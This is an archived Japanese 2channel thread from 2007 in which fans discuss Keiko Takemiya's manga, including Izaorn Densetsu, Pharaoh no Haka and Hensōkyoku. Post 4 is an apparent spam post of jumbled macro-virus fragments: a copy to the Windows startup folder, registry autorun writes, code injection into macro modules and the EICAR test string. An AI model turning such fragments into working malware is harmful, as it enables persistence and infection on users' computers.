2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★竹宮惠子作品について語りましょ★part9

1 :花と名無しさん:2007/10/03(水) 22:14:00 ID:???0
ひき続き皆様でマターリ語りあいましょう。

前スレ
★竹宮惠子作品について語りましょ★part8
http://anime2.2ch.net/test/read.cgi/gcomic/1181478308/

過去スレ等は>>2以降

2 :花と名無しさん:2007/10/03(水) 22:17:36 ID:???0
また糞スレ

3 :花と名無しさん:2007/10/03(水) 22:18:12 ID:???0
part1 http://comic.2ch.net/gcomic/kako/995/995497621.html
part2 http://comic.2ch.net/gcomic/kako/1036/10366/1036668910.html
part3 http://comic.2ch.net/test/read.cgi/gcomic/1042558538/
part4 http://comic6.2ch.net/test/read.cgi/gcomic/1064416048/
part5 http://comic6.2ch.net/test/read.cgi/gcomic/1093014112/
part6 http://comic6.2ch.net/test/read.cgi/gcomic/1111066570/l50
part7 http://anime2.2ch.net/test/read.cgi/gcomic/1135368777/


【関連スレ】
風と木の詩4 竹宮惠子
http://anime2.2ch.net/test/read.cgi/rcomic/1185459509/

地球へ………… 竹宮恵子
http://anime2.2ch.net/test/read.cgi/rcomic/1185354834/

4 :花と名無しさん:2007/10/03(水) 22:42:23 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/10/04(木) 23:26:25 ID:???0
ホシュ

6 :花と名無しさん:2007/10/06(土) 22:01:27 ID:???0
遅ればせながら>>1乙です。

空が好き!って最近思い出す。
あれも今の世ではなかなか表に出せない設定だったな。
考えると今って個人の志向がイッちゃってるのに、社会的な建前だけは厳しくて
逆にまずいかんじがするなあ・・。そのギャップが犯罪を生みやすいとか

7 :花と名無しさん:2007/10/06(土) 22:33:53 ID:???0
保守がわりに初レス。

竹宮さんなら、ウエディングライセンスが好きだ。

8 :花と名無しさん:2007/10/07(日) 00:25:15 ID:???0
>>6
タグ・パリジャンだっけ?10歳くらいだと思うけど経験ありで
詐欺師で、仲間は当り屋とかで、もう大変な世界だよね。
でもあれ読んで当り屋になったとか小学生で性体験したとか
話は聞かないから、今の規制ってどうなんだろと思うな。

9 :花と名無しさん:2007/10/07(日) 12:44:51 ID:???0
今の規制も問題点があるけど、やっぱり親の教育だよ。

10 :花と名無しさん:2007/10/07(日) 13:08:29 ID:???0
無駄な規制で、表現できるものが狭くなるとつまんないよね。
エロとかじゃなく、特殊な状況に置かれて生きぬく逞しい生命力とか
そういう環境設定が自由にできなくなってる気がする。
なのに一方でエロ無法地帯だし。

11 :花と名無しさん:2007/10/07(日) 13:59:51 ID:???0
エロといえば少コミがよく例に挙がってるけど、今の少コミは普通の少女誌だよ。
あっても朝チュンに毛が生えた程度のエチシーンが一作、ぐらいしか載ってない。
それもない号の方が多い。キスシーンはあるが、当然キスシーンもなしで終わる連載もある。
実態スレがなんで未だにあるのかわからん。

12 :花と名無しさん:2007/10/08(月) 03:25:51 ID:???0
私を月まで連れてって、が好き。
漫画の中でも、一番好きな作品。

13 :花と名無しさん:2007/10/09(火) 13:30:38 ID:???0
>>6
「空が好き!」でブランクを置いて描かれた「ノエル!」って結構秀逸だったと思う。
今手元にはないんだが、確かノエルって呼んでた子はボーイッシュな女の子だった。

14 :花と名無しさん:2007/10/09(火) 23:04:02 ID:???0
ノエルは良かったね。
いわゆるベタな「良く出来たお話」の王道だった。

15 :花と名無しさん:2007/10/09(火) 23:18:30 ID:???0
>>13-14
ジュヌヴィエーブ?だっけ。白い毛皮つきのマントを着た女の子に
タグが思いを寄せる話だった気が。自分も好きだったと思う。
でもストーリーを思い出せないな。年ってこういうとこ辛い・・

16 :花と名無しさん:2007/10/10(水) 11:37:28 ID:???0
>>15
自分も年はとりたくないもんだと思うし、話題に参加するなら手元に用意しろ
と言われるだろうなぁ....なんだが、発掘できん。
確か、タグはノエルのことを最初の方では女の子だってわからなかったんだよね。
すっごいお金持ちの家の子だったはず。

17 :花と名無しさん:2007/10/10(水) 16:48:26 ID:???0
>>16
>話題に参加するなら手元に用意しろ
無理なんで、知ってる範囲で語っておけにしようよ。
最後お迎えが来て、去っていくところが綺麗だった。

18 :花と名無しさん:2007/10/13(土) 12:04:19 ID:???0
>>8
タグは14歳くらいじゃないかな?
ジュネが10歳くらい

詐欺師、当たり屋はまだしもジゴロ紛いのことやってるのが
凄いと思ったけど作風がカラッとしてるから読めたんだと思う

>>17
タグが腹膜炎で死にかけてる時、現れたジュヌヴィエーブが
すっごい綺麗だった記憶がある…

19 :花と名無しさん:2007/10/15(月) 14:30:36 ID:???0
当時自分は中学生だったけど、ダグの将来が心配になった。
ノエル家の養子になればいいのにと思った。

20 :花と名無しさん:2007/10/17(水) 14:16:38 ID:rUShnO2t0
僕は妹に恋をする 

21 :花と名無しさん:2007/10/20(土) 21:45:02 ID:???0
スネフェルで2ちゃん検索したけど引っかからなかった。って順当かw
誰か、ファラオ話しませんか?
サリオが主人公なのにいまいち人気が出ない理由を考察とか

22 :花と名無しさん:2007/10/21(日) 00:24:01 ID:???0
サリオに限らず、竹宮作品の主人公っていつも人気なくないか。
真面目な優等生タイプだから。

23 :花と名無しさん:2007/10/21(日) 02:02:31 ID:???0
そだね。でも萩尾望都のトーマの心臓だとガチガチの優等生ユーリが
結構萌えポイント稼いでるし。サリオがユーリ役やったらやっぱりスルー
されそうだな。しかしスネフェルがサイフリート役やったらサイフもっと出せ
コールで番外編制作の確率高しw
ユーリとサリオの違いは言葉にすると何なんだろう。影のあるなし?

24 :花と名無しさん:2007/10/21(日) 03:33:21 ID:???0
「トーマの心臓」のユーリが人気があるのは、
彼が主人公じゃなくて、脇ポジションにいるからのような気がする。
エーリクから見たユーリは、どこか暗い影を持つミステリアスな存在。
彼の秘めた謎をエーリクやオスカーと一緒に
読者が解き明かして行くというミステリーのようなストーリー仕立て。
これには興味を惹かれる。

その一方サリオには暴かれるべき謎というものがない…
謎のないものには惹かれにくい。

セルジュも優等生タイプの主人公だけど、
彼には「実はこんな辛い過去が…」という謎があった。

25 :花と名無しさん:2007/10/21(日) 03:43:13 ID:???0
>>24を書いた後にふと思い出したけど、
「地球へ…」のソルジャーブルーが、男性読者にも人気が高いのは
ブルーは300年間仲間を率いて孤独に戦ってたみたいだけど、
彼の戦いが原作の中では思わせぶりな台詞だけで
一切具体的に描写されなかったからではと思っている。
彼には大いなる謎があるがゆえに、読者の強い興味を惹く存在になったと。

26 :花と名無しさん:2007/10/21(日) 09:23:37 ID:???0
サリオ、謎がなくても魅力的に描けたと思う。
自分的にネックなのは愚かなほどの兄妹愛。あれで萎えた。
セルジュも反感買い捲りのキャラだけど、反骨精神は買うな。
サリオは我慢強いが爺くさい。あ、でも青爺はあれはあれで・・
う〜ん・・見た目もよいのにどうでもよいキャラだよね。

27 :花と名無しさん:2007/10/21(日) 10:35:57 ID:???0
どうでもよいって…かわいそうな。
サリオキスに限らず、強い子良い子正しい子は人気を得にくいんでしょうね。
変奏曲でもエドナンの方が人気あるんじゃ?
私はウォルフ派だけど。

28 :花と名無しさん:2007/10/21(日) 10:42:31 ID:???0
サリオみたいな正統派キャラがいるからこそ
スネフェルみたいな個性的キャラがより映えるってのはあると思うんだけどなあ

29 :花と名無しさん:2007/10/21(日) 11:51:38 ID:???0
>>28
うん、そうだと思うよ。でもだからといって>>28はサリオ萌えなのか?
サリオのつまらなさは分析に値すると思うよ。

30 :花と名無しさん:2007/10/22(月) 19:44:45 ID:???O
世界不思議ハケーンのエジプト(とフランス)の回でスネフェル王の名が。
話はフィクションのはずだけど名前は借りたのかな?

31 :花と名無しさん:2007/10/23(火) 10:11:40 ID:???0
>>30
どういう場面で?ネフェルティティだったら実在してるよね。
観たかったな。あの番組、クイズなしなら面白いんだけど・・

32 :花と名無しさん:2007/10/23(火) 10:20:51 ID:???0
>>31
ttp://www5b.biglobe.ne.jp/~moonover/bekkan/chorono/farao21.htm

ググったらこんなのが

33 :花と名無しさん:2007/10/23(火) 12:16:38 ID:???0
>>32
おお、実在したんだ。d
しかも>名;スネフェル(美しき君) ってイイネ、イイネ

34 :花と名無しさん:2007/10/24(水) 00:34:26 ID:???0
サリオは恋愛らしい恋愛が描かれていなかったのも
面白くない原因の一つかもしれない
アンケスエンへの感情は微妙だしアウラとは成り行きという感じだし
結局、本当に愛していたのは妹のナイルだけ、
それも純粋に兄としての愛情だったし……

35 :花と名無しさん:2007/10/24(水) 20:06:26 ID:???0
しかし、アリとかベヌ・ティトとかイザイとか萌えまでいかなくても
サリオよりポイント高いんだ。恋愛なしなのに。特にアリはイイ!!
サリオより低いのったらあのマントヒヒみたいな裏切り者くらいか・・

36 :花と名無しさん:2007/10/27(土) 12:01:00 ID:???0
アリは不憫すぎる

37 :花と名無しさん:2007/10/28(日) 11:24:36 ID:???0
アリは漢だよ。サリオは少し見習うように。

38 :花と名無しさん:2007/10/30(火) 23:03:57 ID:3PT1dAb20
豚切ってスマソが 

イズァローン好きはいないのかな・・・
あの世界観といい衣装デザといいすごく好きなんだけど


39 :花と名無しさん:2007/11/02(金) 14:31:46 ID:???0
前スレでけっこう話題に上っていた記憶。
主にカウス萌えな内容だったけど。


40 :花と名無しさん:2007/11/02(金) 16:51:36 ID:???0
イズァローンはカウスと主人公萌えがすごくキモい。

41 :花と名無しさん:2007/11/02(金) 16:56:14 ID:o6PvnZLH0
王子様が女体化して男をたぶらかす漫画だわねぇw

42 :花と名無しさん:2007/11/02(金) 19:21:46 ID:???0
名前忘れちゃったんだけど、国王になった王子と、その嫁とかカウスの一途さとか大好きだよー

43 :花と名無しさん:2007/11/02(金) 20:07:10 ID:???0
金の谷のフレイアが凄く好きだった

44 :花と名無しさん:2007/11/02(金) 20:53:50 ID:???0
わあい イザロンきたー

叶わぬ恋のカウスも萌へますが、
ルキシュとフレイアにはも〜っと萌へます。
フレイアのヘアスタイルや装身具のデザイン見るのが楽しみで♪

樹海の神殿とか、砂漠が割れて出てくる神殿とか
憧れるww


45 :花と名無しさん:2007/11/03(土) 15:14:24 ID:???0
真の夫婦になる前のルキシュとフレイアの
良好だけど微妙な関係が面白かった
最後は相愛になってめでたしめでたしなんだけど
ちょっと唐突な気がした

46 :花と名無しさん:2007/11/03(土) 17:59:58 ID:???0
自分もフレイアとルキシュの関係が好きだったから
もう少し詳しく読みたかった。
語呂いいよな。金の谷のフレイア。

47 :花と名無しさん:2007/11/03(土) 20:08:46 ID:???0
王になりたてのころはルキシュかわいそうだった。
真の主人公はルキシュかも。

48 :花と名無しさん:2007/11/07(水) 00:44:18 ID:???0
「王はティオキアを惜しんでいる」
指先が白くなっているのをルキシュが目ざといシーン
細かい芸に、いまだに印象深い

49 :花と名無しさん:2007/11/07(水) 17:18:57 ID:???0
読みました。風木で鼻が詰まって息ができなくなるほど泣いた自分だが
イズァローンは淡々と読めたな。ここんちのサリオは結構いい仕事したと思う。
フレイアのキャラはやっぱ苦手。結局あんまり役にたたないところがフィシス
っぽいし。全体的には面白かったです。

50 :花と名無しさん:2007/11/08(木) 01:32:31 ID:???0
ここんちのサリオ=ティオキアか
竹宮主人公の中では脇を抑えて健闘してる方だよね。
まあ、一番主人公らしいのは自分的にはタグだけど

51 :花と名無しさん:2007/11/08(木) 02:40:16 ID:???0
ジムサとアフルの愛をもう少し際どく表現した「アンドロメダストーリーズ」
のリメイク版を希望。

52 :花と名無しさん:2007/11/11(日) 08:13:04 ID:???O
変奏曲って最近出たっぽいけど、作品はいつ頃のですか?
風木、地球あたりの絵柄が好きなんですが…

53 :花と名無しさん:2007/11/11(日) 10:25:54 ID:xunyeSyi0
カゼキ、寺と同じ頃だろ、ホモ描写が綺麗です。

54 :花と名無しさん:2007/11/11(日) 16:15:15 ID:???0
天馬の血族の帝と椅子参るってやってるの?
残虐にいたぶってたと思いきや帝がたまに「おお・・・いい・・・」とか言って悶えてるし
これは801シーンなのか??と
生殖能力はないっていうのは機能が無いのかティンコを持っていないのか?


55 :花と名無しさん:2007/11/11(日) 18:21:28 ID:???0
>>52
けっこう長期に渡りいろんな雑誌をうつりわたってポツンポツンと連載されてる。

最初の『ヴィレンツ物語』が花とゆめに掲載されたのは、74年で、風木連載開始)より
2年も前。
風木開始とほぼ同期に別コミで連載されたのが「変奏曲 エドアルド・ソルティを
記述する試み」その後エドナンやウオルフやアネットを主人公にした作品が
相次いで掲載。
主人公達の子供の世代の「カノン」は、え〜と....風木の終り頃?終わったあと?
グレープフルーツという雑誌に掲載された。
もっと詳しい人宜しく。

56 :花と名無しさん:2007/11/11(日) 20:22:20 ID:???0
変奏曲の3巻まだかなー

57 :花と名無しさん:2007/11/11(日) 23:07:30 ID:???0
ニーノかわいい


58 :花と名無しさん:2007/11/15(木) 00:27:37 ID:???0
>>56
10月発売のはずだったのにね。
この頃のカラー絵美しすぎる。
もちろん中身の絵も・・流れるようなラインが優雅で。
この世代のマンガ読むとヨーロッパ行きたくなる

59 :花と名無しさん:2007/11/15(木) 23:24:55 ID:???0
朝の超ラッシュ通勤電車に乗ってて
ふと自分の目の前に座ってた人が立ったりすると、
思わず心の中で
「今になって私にこんな喜びが!!」と呟いてしまう。。

60 :花と名無しさん:2007/11/15(木) 23:31:08 ID:???0
「今になって私にこんな喜びが!!」
  ↑
これ何の台詞だっけ?
セルジュを見たお爺さんだっけお婆さんだっけ…?

61 :花と名無しさん:2007/11/16(金) 00:43:12 ID:???0
本当に呟いちゃってるのか、ちょっと心配W

62 :花と名無しさん:2007/11/16(金) 12:32:50 ID:???O
竹宮惠子さんと萩尾望都さんて今も仲良しなのかな?

63 :花と名無しさん:2007/11/16(金) 13:57:40 ID:???0
萩尾ファンにはさんざん馬鹿にされてるのに仲がいいはずないって

64 :花と名無しさん:2007/11/16(金) 14:04:53 ID:???0
前々からこの卑屈な一匹>>62-63があちこちで目立ちすぎなんだわ

65 :花と名無しさん:2007/11/16(金) 14:16:00 ID:???O
いや、ただ純粋に竹宮さんも萩尾さんも好きだから知りたかっただけなんだけど。

66 :花と名無しさん:2007/11/16(金) 14:19:34 ID:???0
竹宮信者はあほかわいいけど萩尾信者理詰めでキモイ。

67 :花と名無しさん:2007/11/16(金) 14:24:17 ID:???0
そういえば、前は仲よしだったから大泉サロンが存在してたんでしょ。
離れた理由って何だろう?一緒に書いてたわけじゃないんだから
志向性の違いっていうのも何だし。別に住むのはありでも交流がなくなる
理由がわからないな


68 :花と名無しさん:2007/11/16(金) 14:29:24 ID:???0
互いに忙しいし方向性も違うし粘着交流する必要あるかな?
どっちも頑張ってるでいいじゃん。竹宮信者は卑屈で叩き好きと思われたくないね

69 :花と名無しさん:2007/11/16(金) 14:54:45 ID:???O
仲いいかどうかの話で、なんで信者とか叩きとかの話になるかな。

70 :花と名無しさん:2007/11/16(金) 15:09:22 ID:???0
そら信者の傾向決めつけと叩きに腐心してるのがいるからでしょうなあ。
それと女同士の同居ってせいぜい20代までだと思う。

71 :花と名無しさん:2007/11/16(金) 16:58:37 ID:???0
竹宮は偉そうだし、萩尾は暗そうだ。
プライドだけは異常に高そうだから同居してもおもしろくないだろ。

72 :花と名無しさん:2007/11/16(金) 17:08:43 ID:???0
>>66
あほかわいいレスしろよ馬鹿

73 :花と名無しさん:2007/11/16(金) 17:58:43 ID:???0
テラ以降の竹宮スレなんて意味のないつまんない欺瞞に満ちててしょうもないわ

74 :花と名無しさん:2007/11/16(金) 18:12:10 ID:???0
そうでもない。一匹の馬鹿が顰蹙買ってるだけ

75 :花と名無しさん:2007/11/16(金) 18:18:19 ID:???0
ここに居ついたのか(爆

76 :花と名無しさん:2007/11/16(金) 18:31:36 ID:???0
漂流してんじゃないの?最近落ちた少年愛がどうとかいう某スレで
ageて罵ったりsageてマンセーしたりしてた奴だろ

77 :花と名無しさん:2007/11/16(金) 19:18:39 ID:???0
そそw 顔見てみたいよねwww

78 :花と名無しさん:2007/11/16(金) 19:29:03 ID:slsOyDq20
低脳スレッドのクズが

79 :花と名無しさん:2007/11/16(金) 20:24:42 ID:???0
ktkt

80 :花と名無しさん:2007/11/16(金) 20:36:11 ID:weBaNsHB0
ウンコくさいホモ漫画のどこが高尚だ?

81 :花と名無しさん:2007/11/16(金) 23:42:55 ID:???0
しかし電波タンも息が長いな〜
竹宮系スレにへばり付いて何年だ?

82 :花と名無しさん:2007/11/17(土) 08:58:45 ID:???0
座敷童みたいだよねw
ここも一時過疎ってたけど、電波オバ来てからレス伸びてる。
過疎の理由もオバだと思うけどwww

83 :花と名無しさん:2007/11/17(土) 16:12:42 ID:8XE7UoCi0
もまいらのホモショタ話、うんざり。

84 :花と名無しさん:2007/11/21(水) 12:35:02 ID:???0
本棚片付けてたら時を往く馬が出てきたので記念カキコ

新作は?

85 :花と名無しさん:2007/11/21(水) 13:03:46 ID:CCjrNUFE0
寺キャラの裸のでてくる漫画なら大ヒット間違いなしです。せんせーw

86 :花と名無しさん:2007/11/21(水) 23:16:51 ID:???0
>56 出版元のサイト見てきたら発売予定が「2008年春、4半世紀ぶりに完結」に修正されてた
増山さんが別の仕事で忙しいらしくて年末くらいから執筆に入る予定って書いてある

87 :花と名無しさん:2007/11/22(木) 01:05:15 ID:???0
出す出す詐欺…

88 :花と名無しさん:2007/11/22(木) 17:19:36 ID:hnxcTb0b0
変奏曲ってえどなんのホモ描写以外つまらん

89 :花と名無しさん:2007/11/22(木) 17:46:37 ID:???0
私、変奏曲3巻が出たら全巻まとめ買いするんだ…

90 :花と名無しさん:2007/11/22(木) 17:57:13 ID:???0
>>87
つうか(ノンたんの)書く書く詐欺といえよう

91 :花と名無しさん:2007/11/22(木) 19:04:07 ID:???0
もう竹宮には繊細な絵が描けないんだからだしてもしょうがない。

92 :花と名無しさん:2007/11/22(木) 19:33:59 ID:???0
>>90
書く書く詐欺か。
ノンたんがHPでちょっと連載してた続編読んでこりゃあダメだと思った。

自分はカノン(子供達の話)のうじうじニーノが嫌いなんだよね。
エドナンはもともと父親向きの性格してないんで、あれを貫いてくれたのは
けっこう気に入ってたんだ。
むしろ、自分を棚にあげて、育児に関して偉そうな事いってるボブがイヤだな。
模範的でない不良大人のボブの方がよかった。

93 :花と名無しさん:2007/11/22(木) 20:08:19 ID:???0
書く書く詐欺ww 
小説にするにしても増山さんは原案てことでとどまっていただいて、
ちゃんとした字書きに活字化してもらいたい自分がいる。


94 :花と名無しさん:2007/11/22(木) 21:01:47 ID:???0
>93さんに同意ーー!
HPに載ってた続編、ものすごく読み難かった

95 :花と名無しさん:2007/11/22(木) 22:01:05 ID:???0
漫画のストーリーの何%ぐらいが増山作なのかは知らないけど
やっぱ竹宮御大が描いたから面白い漫画になったと思うんだよね。
増山さんの文章は私もHPの続編しか読んだ事ないけど
確かに読みづらかった・・・ていうか最初の方で挫折。
プロの物書きの文章じゃないよ・・

96 :花と名無しさん:2007/11/22(木) 22:11:28 ID:???0
竹宮さんて、イズァローンとかファラオとか見ても"読ませるチカラ"ってすごいよね
イズァローンの柱で「イズァローン伝記(だっけ?を読んでみたいので入手したい」って問い合わせあった
って書いてあったけど読み手を引き込ませるハッタリが上手い
変奏曲も竹宮さんが書いたから面白かったんだろうなー(と、サイトの続編読んで思った)

97 :花と名無しさん:2007/11/22(木) 22:42:25 ID:???0
そのハッタリ感が鼻につきはじめるとダメなのかも
消防時代にふと気になりだしてまともに読めなくなった。でも夏の扉から
イズァローンまではほぼ全部読んで、とても面白かったです

98 :花と名無しさん:2007/11/23(金) 00:28:29 ID:???0
>>96
それは確かファラオの方。最近出た保存版のでっかい本でしょ?
イズァローンは御伽話って感じがするけど、
ファラオは本当に元ネタがありそうだもんね。

99 :花と名無しさん:2007/11/23(金) 07:06:33 ID:???O
この人のは風と木の詩(図書館)、天馬の血族(漫画喫茶)、地球へ(新装版購入)で3作しか知らないんだけど面白かった
特に風と木の詩はやばかった図書館で泣きそうになって
他のも読んでみたいけどなにせ金がないもんで片っ端から集めるとか無理だし昔のだから漫画喫茶にもないんだよね(´・ω・`)
これは読むべきというのがあったら教えて欲しい

100 :花と名無しさん:2007/11/23(金) 09:11:48 ID:???0
ホントだ、すっかり間違ってた。>>98さん訂正d!

風木、天馬、地球へは自分は読んでない物ばかりなので合うかどうかわからないけれど
「ファラオの墓」、「イズァローン伝説」、「私を月まで連れてって!」、「疾風のまつりごと」をおすすめする
どれも文庫になってるしブコフで立ち読みできるかもしれない

101 :花と名無しさん:2007/11/23(金) 11:26:27 ID:???0
あとオルフェシリーズとエデンかな

読むの遅いと、漫喫って以外と高い事に気づいて以来、
古い漫画はブコフで、と思ってるけど
ほしいのに限ってなかったりするよね。。

102 :花と名無しさん:2007/11/23(金) 11:51:31 ID:???0
エデンもすきだ! 流れを考えると私を月〜から読んで欲しいが単品でも読めなくはない
ファラオをイズァローンが同系統で歴史っぽい系
私を〜は・・・ラブコメ?SF? エデンもSF 
疾風〜は和風ファンタジーでしょうか
アフターファイブ レボリューションは現代物だけど面白く無かった・・
同じ現代物なら「姫くずし」のがいいかな?掲載紙がLALAか何かでちょと独特の"雰囲気マンガ"だが


103 :花と名無しさん:2007/11/23(金) 12:32:48 ID:???0
図々しくて申し訳ないのですが
今海外にいて、持ってきそびれた風と木の詩を
母親に送ってもらおうと企んでいるのだけど全巻送ってもらうのは高くつきすぎるから
ジルベールとセルジュが結ばれるとこ、送ってもらおうかと思ってます。
ただいかんせん何巻かわからん...
どなたか白泉社の10巻本のなかで、二人が急接近しだすあたりの巻数わかるかたいらっしゃいますか?
レポートも書いちゃおうかと企んでいるので、助けていただけるとほんとうにうれしいです。



104 :花と名無しさん:2007/11/23(金) 13:57:11 ID:???0
海外でまで風木って・・・レポートって・・・

105 :花と名無しさん:2007/11/23(金) 14:06:41 ID:???0
机の上に白泉社10冊積んでたのでみてみた
二人が急接近するのは7巻以降
二人が結ばれるのが8巻以降

で、いったい風木でどういったレポートを‥
それも海外で‥気になる‥

106 :花と名無しさん:2007/11/23(金) 14:28:42 ID:???0
というか、もし学校に提出用のレポートなら
全巻必要だろうと普通に思う。

107 :花と名無しさん:2007/11/23(金) 15:10:27 ID:???0
>>105
早速ありがとうございます。ほんとうに助かります。

>>106 そうなんですよね。
ほんとうはいるとは思うんですが、
ストーリーは頭に入っているのでなんとかしようと思ってまして。

レポートは美術史の授業用のもので、トピックは現代の視覚美術におけるゲイ、レズビアン、クイア表象について
というものです。
まだ書き出してはいませんが、24年組の作家を中心に書こうと思ってます。
ジェンダー/セクシュアリティ
の多様性と欲望のありかたについて、特に女性の視線について書こうかなと。
まだ構想中なので、あやふやなんですが。

面白いものが書けるといいのですが。




108 :花と名無しさん:2007/11/23(金) 15:25:52 ID:S2cz4NNt0
処女の美少年妄想はすごいよね。やおいの創始者だしw

109 :花と名無しさん:2007/11/23(金) 15:43:40 ID:???0
処女のホモ漫画の研究w

110 :花と名無しさん:2007/11/23(金) 17:09:12 ID:???0
美少年って女と一緒だし

111 :花と名無しさん:2007/11/23(金) 18:20:11 ID:???0
マジホモからは軽蔑され、腐に歓迎されてるわけだが…

112 :花と名無しさん:2007/11/23(金) 19:29:36 ID:???0
【海外/アフガニスタン】「少年の香りは最高」 踊り子少年たちが男性客の愛人に
http://news22.2ch.net/test/read.cgi/newsplus/1195516300/

1 名前:なべ式φ ★[sage] 投稿日:2007/11/20(火) 08:51:40 ID:???0
アフガニスタン北部には、少女のような容姿で男性客のために踊る10代の少年がいる。少年による
踊りは昔からの慣習だが、踊り子少年たちの一部は、部族軍の元・長など裕福で権力のある男性客
により、売春行為を強要されている。

これらの少年は少女の格好をさせられた上、多くのプレゼントを与えられ、「愛人」として扱われている。

イスラム教の聖職者は、こうした行為はイスラム法で禁止されている「男色」だとして、関与した者に
石投げの罰を科すよう主張。当地の警察も取り締まりを行っている。

ムジャヒディン(イスラム戦士)の元メンバーで、同国北部の町Pul-e-Khumriに住むビジネスマン(38)は、
3年前に職を探していた15歳の少年を選んで、住む場所を与えたと語る。少年の写真を見せながら
「少年を抱きしめることを非常に楽しんでいる。少年の香りは最高」と述べた。

男性はまた「私には妻がいないし、少年が妻のようなもの。少年には女性服を着せ、私の横に寝かせて
いる。私は彼を楽しんでいるし、彼は私のすべて」としている。

http://jp.reuters.com/article/oddlyEnoughNews/idJPJAPAN-28960920071119

113 :花と名無しさん:2007/11/23(金) 19:38:55 ID:???0
それ前に見た

114 :花と名無しさん:2007/11/23(金) 20:01:11 ID:???0
 んこはどうしてるんだろうね?

115 :花と名無しさん:2007/11/23(金) 20:07:36 ID:???0
少年の意志は無視

116 :花と名無しさん:2007/11/23(金) 21:57:51 ID:???0
日本のサラリーマンも現地妻いる人おおい。
マジで男の子を妻にしてるのもいる。

117 :花と名無しさん:2007/11/23(金) 22:01:59 ID:???O
99です。
教えてくれてありがとう。
歴史物が舞台なの好きだからフィラオかイズァーロンのどっちかから読んでみようかな
本当、ブックオフにあるといいが

118 :花と名無しさん:2007/11/23(金) 22:16:50 ID:???0
イズァーロンはおすすめだけどファンタジー色が結構入ってるよ
歴史物がすきならファラオの墓かな

119 :花と名無しさん:2007/11/23(金) 22:24:00 ID:???0
ファンタジーってご都合主義だが歴史物でもご都合主義なケーコタンw

120 :花と名無しさん:2007/11/23(金) 22:36:52 ID:???O
>>118
漫画に現実性とか史実は求めてないんでファンタジー色強くても面白かったらおKだよ
自分の好きなベルばらとかも舞台はフランス革命だけど勉強するとかなりご都合主義だったし
それでもべるバラが名作になったゆえんは強力に話に惹きつけられるストーリーだと思うし
魅せられる作品が自分は読みたい

121 :花と名無しさん:2007/11/23(金) 23:04:52 ID:???0
ファラオは歴史ものっぽい体裁だけど、フィクションだよね。
イズァローンも面白かったが、個人的にはファラオが好き。

122 :花と名無しさん:2007/11/23(金) 23:12:19 ID:???0
魔物とティオキアがわけわからずイズァローン途中で脱落したんですが
ラストまでにルキシュとフレイアの子供はできたのですか?

123 :花と名無しさん:2007/11/24(土) 00:06:26 ID:???0
コミクスでも愛蔵版でも文庫版でも全巻揃えたが最後を見て捨ててしまう>イズァローン
終わりの付近までは盛り上がるのに(途中不必要にカウスが出張るのは余分だけど)最後の最後だけがイマイチ

124 :花と名無しさん:2007/11/24(土) 22:32:05 ID:ca94qvXk0
王子様かわいくないよな、美人なだけで馬鹿みたい。

125 :花と名無しさん:2007/11/25(日) 20:24:25 ID:???O
イズァローンって字面も発音もめんどくさ…

126 :花と名無しさん:2007/11/25(日) 21:39:53 ID:???0
発音はおもいきり「いずあろーん」って発音してるけど

127 :花と名無しさん:2007/11/25(日) 22:22:40 ID:???0
イズァローン、オチだけ知りたいというのは外道なのでしょうな・・・
読めども読めどもティオキアが魔物が〜で何をどうしたいかサッパリだったんさ・・・

128 :花と名無しさん:2007/11/25(日) 22:50:30 ID:VpvLpA4m0
カウスの真実の愛で救われて、死んでも生まれかわって来世で愛し合う約束したんじゃなかったっけ?
もう忘れたw

129 :花と名無しさん:2007/11/25(日) 23:11:33 ID:???0
ヤバ、カウスが思いだせねー
あれルキシュの話かと思ってたがトリはティオキアだったのね

130 :花と名無しさん:2007/11/25(日) 23:36:38 ID:VpvLpA4m0
結局、恋愛モノで終わったんだろ。バケモノ関係ないねw

131 :花と名無しさん:2007/11/26(月) 19:34:59 ID:???0
カウスが出てから話が違う方向へいっちゃった感じ。
カウスが出てこなければルキシュとティオキアを軸にちゃんと終わっただろうなー

132 :花と名無しさん:2007/11/26(月) 20:35:52 ID:???0
ある意味ルキシュとカウスが主人公みたいな話だった。
ティオキアは狂言回しの役。

133 :花と名無しさん:2007/11/26(月) 21:37:58 ID:???O
やっぱ竹宮先生の描く少年、同性愛描写は美しいなぁ…。
見ててうっとりする。

134 :花と名無しさん:2007/11/26(月) 21:50:10 ID:???0
イズァローンにマーリとかいうky女いたよな。あれどうなったんだろ

135 :花と名無しさん:2007/11/26(月) 22:11:54 ID:???0
ルキシュを救おうとして死んだはず。

136 :花と名無しさん:2007/11/27(火) 01:55:37 ID:???O
カキコする人皆無だけど「空が好き」はイイ。
主人公のタグって、ジルのプロトタイプじゃね?

137 :花と名無しさん:2007/11/27(火) 13:19:34 ID:LMM1O4w+0
タグは石原裕次郎に似ている。

138 :花と名無しさん:2007/11/27(火) 13:28:50 ID:???0
タグ≒ジル≒石原裕次郎・・・?

139 :花と名無しさん:2007/11/27(火) 13:35:30 ID:???0
>>136
上のレスでタグについて語ってる

140 :花と名無しさん:2007/11/27(火) 13:45:53 ID:LMM1O4w+0
ガキ大将で女ッタラシで男にも慕われ、芸達者。

31 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)